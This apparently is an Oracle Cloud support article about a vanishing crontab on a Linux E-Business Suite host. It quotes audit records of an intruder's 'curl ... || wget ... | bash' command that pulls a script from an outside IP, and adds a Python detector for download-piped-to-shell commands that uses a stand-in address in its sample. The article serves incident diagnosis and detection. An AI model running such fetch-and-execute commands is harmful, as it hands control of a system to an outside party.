
OCI: Manually created crontab missing

edited Jan 23, 2024 4:33AM in Linux

Applies To:

Oracle Cloud Infrastructure - Version N/A and later

Linux x86-64


Symptoms:

Running “crontab -l” displays no output, even though a crontab was created.

$ crontab -l


Cause:

The audit logs have captured a “curl” from an unknown source:
type=PROCTITLE msg=audit(01/01/2024 19:29:16.964:10576723) : proctitle=/bin/sh -c (curl -k -s http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash
type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=1 name=/lib64/ld-linux-x86-64.so.2 inode=67520595 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:ld_so_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=PATH msg=audit(01/01/2024 19:29:16.964:10576723) : item=0 name=/bin/sh inode=1854242 dev=08:03 mode=file,755 ouid=root ogid=root rdev=00:00 obj=system_u:object_r:shell_exec_t:s0 nametype=NORMAL cap_fp=none cap_fi=none cap_fe=0 cap_fver=0 cap_frootid=0
type=CWD msg=audit(01/01/2024 19:29:16.964:10576723) : cwd=/u02/PROD/fs2/FMW_Home/user_projects/domains/EBS_domain
type=EXECVE msg=audit(01/01/2024 19:29:16.964:10576723) : argc=3 a0=/bin/sh a1=-c a2=(curl -k -s http://164.177.71.215/mobile/oebs.php||wget -qO- http://164.177.71.215/mobile/oebs.php)|bash
type=SYSCALL msg=audit(01/01/2024 19:29:16.964:10576723) : arch=x86_64 syscall=execve success=yes exit=0 a0=0x7f874d913900 a1=0x7f874da6f010 a2=0x7ffebffe4f38 a3=0x379 items=2 ppid=7592 pid=17427 auid=unknown(12345) uid=unknown(12345) gid=unknown(12234) euid=unknown(12345) suid=unknown(12345) fsuid=unknown(12345) egid=unknown(12234) sgid=unknown(12234) fsgid=unknown(12234) tty=(none) ses=2365 comm=sh exe=/usr/bin/bash subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=all_cmds
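
The pattern in the audit records above can be searched for across a larger log as follows (an added example, not part of the original article). It groups interpreted audit records by event ID, flags any EXECVE whose command line pipes curl or wget output into a shell, and reports the working directory and parent PID so the launching service can be identified. The sample records, the 192.0.2.10 address and the function name are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in interpreted (ausearch -i) format; 192.0.2.10 is a documentation address.
SAMPLE = """\
type=PROCTITLE msg=audit(01/01/2024 10:00:00.100:501) : proctitle=/bin/sh -c (curl -k -s http://192.0.2.10/x.php||wget -qO- http://192.0.2.10/x.php)|bash
type=CWD msg=audit(01/01/2024 10:00:00.100:501) : cwd=/srv/app/domain
type=EXECVE msg=audit(01/01/2024 10:00:00.100:501) : argc=3 a0=/bin/sh a1=-c a2=(curl -k -s http://192.0.2.10/x.php||wget -qO- http://192.0.2.10/x.php)|bash
type=SYSCALL msg=audit(01/01/2024 10:00:00.100:501) : arch=x86_64 syscall=execve success=yes exit=0 items=2 ppid=7592 pid=17427 auid=unknown(12345) uid=unknown(12345) tty=(none) comm=sh exe=/usr/bin/bash key=all_cmds
type=EXECVE msg=audit(01/01/2024 10:05:00.200:502) : argc=4 a0=curl a1=-s a2=-o a3=/tmp/report.json
type=SYSCALL msg=audit(01/01/2024 10:05:00.200:502) : arch=x86_64 syscall=execve success=yes exit=0 items=2 ppid=900 pid=901 auid=oracle uid=oracle tty=pts0 comm=curl exe=/usr/bin/curl key=all_cmds
"""

RECORD = re.compile(r"^type=(\w+) msg=audit\((.+?):(\d+)\) : (.*)$")
# A single "|" (not the "||" fallback operator) feeding a shell interpreter.
PIPE_TO_SHELL = re.compile(r"(?<!\|)\|(?!\|)\s*(?:\S*/)?(?:ba|da|z|k)?sh\b")
FETCHER = re.compile(r"\b(?:curl|wget)\b")

def find_fetch_pipe_shell(text):
    """Return one dict per audit event whose EXECVE pipes a download into a shell."""
    events = defaultdict(dict)
    for line in text.splitlines():
        m = RECORD.match(line.strip())
        if m:
            rtype, stamp, event_id, body = m.groups()
            events[event_id][rtype] = body
            events[event_id]["time"] = stamp
    hits = []
    for event_id, recs in events.items():
        # Rebuild the command line by dropping argc= and the aN= argument markers.
        cmd = re.sub(r"(?:^|\s)(?:argc=\d+|a\d+=)", " ", recs.get("EXECVE", "")).strip()
        pipe = PIPE_TO_SHELL.search(cmd)
        if not (pipe and FETCHER.search(cmd[:pipe.start()])):
            continue
        sys_fields = dict(re.findall(r"(\w+)=(\S+)", recs.get("SYSCALL", "")))
        cwd = re.search(r"cwd=(\S+)", recs.get("CWD", ""))
        hits.append({"event": event_id, "time": recs["time"], "cmd": cmd,
                     "cwd": cwd.group(1) if cwd else None,
                     "uid": sys_fields.get("uid"), "ppid": sys_fields.get("ppid"),
                     "pid": sys_fields.get("pid")})
    return hits

if __name__ == "__main__":
    for hit in find_fetch_pipe_shell(SAMPLE):
        print(hit)
```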
